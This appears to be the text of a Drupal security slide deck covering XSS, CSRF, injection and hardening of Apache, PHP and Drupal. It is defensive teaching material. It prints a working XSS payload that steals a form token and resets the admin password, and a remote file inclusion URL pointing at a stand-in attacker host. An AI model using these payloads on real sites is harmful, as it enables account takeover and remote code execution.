All about web application security and common threats and how to counter measure these threats The content of this presentation was derived from several notable Drupal SA team like Greg Knaddison, Khalid Baheyeldin, Heine Deelstra, and Dave Reid. Special thanks to Greg's book "Cracking Drupal: A Drop in the Bucket".

2. Agenda
● Anatomy of Vulnerabilities
● Protecting against Vulnerabilities

3. Kite Systems is an Agile development house
which means the client is actively involved
all the way through the development
process.
We build high quality, secure platforms
using Java J2EE, Microsoft .NET, Ruby on
Rails, PHP and Python.

4. Join Us

5. About myself, Gerald Villorente
● Web Developer/themer at Kite Systems Inc.
● Drupal developer since 2010
● Drupal PH kids mentor

6. Is Drupal Secure?

7. State of being “SECURE”
A site is secure if:
● private data is kept private,
● the site cannot be forced offline or into a
degraded mode by a remote visitor
● the site resources are used only for their
intended purposes
● the site content can be edited only by
appropriate users.”

10. Week spot of web applications
For Drupal developer who wants to deliver an
applications, security do not ends with proper use
of Drupal security API:
● OS (MS, Unix, BSD, OS X)
● Web Server (Apache, IIS, Nginx, ...)
● Web Platform (php, .NET, ...)
● Other Services (ftp, …)
● Web applications - attacks against authentication &
authorization, site structure, input validation, app logic
● database - sql injection
● availability - DoS attacks

11. Common Drupal attacks
● XSS
● CSRF
● Injection

12. XSS
jQuery.get(Drupal.settings.basePath + 'user/1/edit',
function (data, status) {
if (status == 'success') {
// Extract the token and other required data
var matches = data.match(/id="edit-user-profile-form-form-token" value="([a-z0-9])"/);
var token = matches[1];
// Post the minimum amount of fields. Other fields get their default values.
var payload = {
"form_id": 'user_profile_form',
"form_token": token,
"pass[pass1]": 'hacked',
"pass[pass2]": 'hacked'
};
jQuery.post(Drupal.settings.basePath + 'user/1/edit', payload);
}
}
);
}

13. Other Attacks
● DDoS
● Remote code execution
- Exploiting register_globals in PHP
require ($page . ".php");
http://www.vulnsite.com/index.php?page=http://www.attacker.com/attack.txt

14. Demo

15. Counter Measures
● Proper use of Drupal API
● Coding Standard (coder, code_sniffer)
- Coder & Sniffer demo
● Keep up with security patches and minor
releases
● Permission by role (hook_perm, user_access)
● Firewall
● SSL (Secure Socket Layer)

16. Counter Measures (cont.)
● File permission

17. Apache Hardening
● Disable unneeded modules
● Implement ModSecurity, Request Filtering,
Anti-Evasion Techniques, HTTP Filtering
Rules, Full Audit Logging, HTTPS
Intercepting, Chroot Functionality, Mask
Web Server Identity
● Document root restriction – allow Apache to
only go to /path/to/public_html

18. Apache Hardening
● Chrooting Apache
$ mkdir -p /var/chroot/apache
$ adduser --home /var/chroot/apache --shell /bin/false
--no-create-home --system --group juandelacruz

19. PHP Hardening (part 1)
● turn off register_globals
● open_basedir - restrict php file access to only
certain directories
● disable_functions
● expose_php - remove php info from http headers
● display_errors
● safe_mode - php can use only files which it is an
owner
● allow_url_fopen

20. PHP Hardening (part 2)
● Suhoshin
- php engine protection with couple of
patches
- range of runtime protection, session
protection, filtering features and logging
- features

21. Drupal Hardening
● Keep updated
● Coding standard
● Install only trusted module, check issue
queue
● Use captcha, login_security, single_login,
password_policy, salt
● user permission
● input formats and filter

22. Drupal Hardening: Coding Standard
Never write and/or execute sql commands manually, use Drupal DB layer
use db_query() properly
don't write
db_query("SELECT * FROM {users} WHERE name = '$username'") ;
write this
db_query("SELECT * FROM {users} WHERE name = '%s'", $username);
placeholders are: %s, %d, %f, %b, %%
use db_rewrite_sql to respect node access restrictions
$result = db_query(db_rewrite_sql("SELECT n.nid, n.title FROM {node} n"));

23. Drupal Hardening: Form API
● never write forms that manually uses Drupal's Forms API
● Forms API protects you from invalid form data
● Forms API protects you against CSRF
● don't trust js for input validation - its easy to disable it. If
you want to use it always check user data on server side.
● when using AJAX use drupal_get_token and
drupal_check_token:
● Calculate hash of defined string, user session and site
specific secret code

24. Drupal Hardening: File Upload
● file_validate_is_image - check if file is really
an image
● check_file - check if file is uploaded via
HTTP POST
● file_check_location - Check if a file is really
located inside $directory
● set disk quotes properly - you don't want to
fill server hard disk

25. Drupal Hardening: Respect and define
new permissions
● consider to use hook_perm in your module
● wrap your code with user_access
if (user_access('some permission')) { .... }
● filter_access($format) – check if user has
access to requested filter format
● use menu access arguments

26. Drupal Hardening: Dont trust user input
Filter user input, sanitize the output
● Input Format
● filter_xss() - Filters HTML to prevent XSS
● check_plain() - Encodes special characters
in a plain-text string for display as HTML
● check_url() - filter dangerous protocol
● check_markup - Run all the enabled filters
on a piece of text

27. Drupal Hardening: Dont trust user input

28. Again, think like a hacker...
● Use penetration testing tool
- Metasploit framework
- Nessus
- Nikto
- Backbox and Backtrack
● Fix, audit, fix ...

29. Resources
● http://drupal.org/security
● http://drupal.org/writing-secure-code
● http://crackingdrupal.com
● http://www.owasp.org
● http://ha.ckers.org
● http://www.exploit-db.com